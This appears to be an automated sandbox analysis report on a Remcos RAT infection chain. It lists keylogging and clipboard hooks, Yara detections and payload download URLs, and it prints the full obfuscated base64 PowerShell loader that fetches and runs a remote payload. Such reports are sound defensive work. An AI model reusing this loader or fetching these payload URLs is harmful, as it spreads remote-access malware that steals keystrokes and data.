Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazohj6
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/ed63b646-30bf-4545-bacd-1a1d263f75fb/downloads/6d9f1851-1729-
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10603000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/hector4576--/noviembre19/downloads/sos19nov.txt
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C328FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.1428025398.0000025F1153A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F11E38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C410EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1356648553.0000026C32A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1373918756.0000026C41225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000D.00000002.1356648553.0000026C32531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: powershell.exe, 00000007.00000002.1428025398.0000025F10A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1428025398.0000025F10A92000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website

Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 185.166.143.49:443 -> 192.168.2.7:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.196.57:443 -> 192.168.2.7:49747 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000

15_2_004099E4

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Contains functionality for read data from the clipboard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to modify clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to read the clipboard data

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,

15_2_00409B10

Yara detected Keylogger Generic

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR

E-Banking Fraud

Contains functionalty to change the wallpaper

Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2555071529.0000000001158000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\registros.dat, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041BB77 SystemParametersInfoW,

15_2_0041BB77

System Summary

Malicious sample detected (through community Yara rule)

Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects known downloader agent Author: ditekSHen
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\			Jump to behavior

Abnormal high CPU Usage

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Process Stats: CPU usage > 49%

Contains functionality to shutdown / reboot the system

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

15_2_004158B9

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFAAC480FFA	7_2_00007FFAAC480FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFAAC55115D	7_2_00007FFAAC55115D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041D071	15_2_0041D071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004520D2	15_2_004520D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043D098	15_2_0043D098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00437150	15_2_00437150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004361AA	15_2_004361AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426254	15_2_00426254
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00431377	15_2_00431377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043651C	15_2_0043651C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0041E5DF	15_2_0041E5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0044C739	15_2_0044C739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004367C6	15_2_004367C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_004267CB	15_2_004267CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043C9DD	15_2_0043C9DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00432A49	15_2_00432A49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00436A8D	15_2_00436A8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043CC0C	15_2_0043CC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00436D48	15_2_00436D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00434D22	15_2_00434D22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426E73	15_2_00426E73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00440E20	15_2_00440E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_0043CE3B	15_2_0043CE3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00412F45	15_2_00412F45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00452F00	15_2_00452F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 15_2_00426FAD	15_2_00426FAD

Found potential string decryption / allocating functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00401F66 appears 50 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 004020E7 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 004338A5 appears 41 times
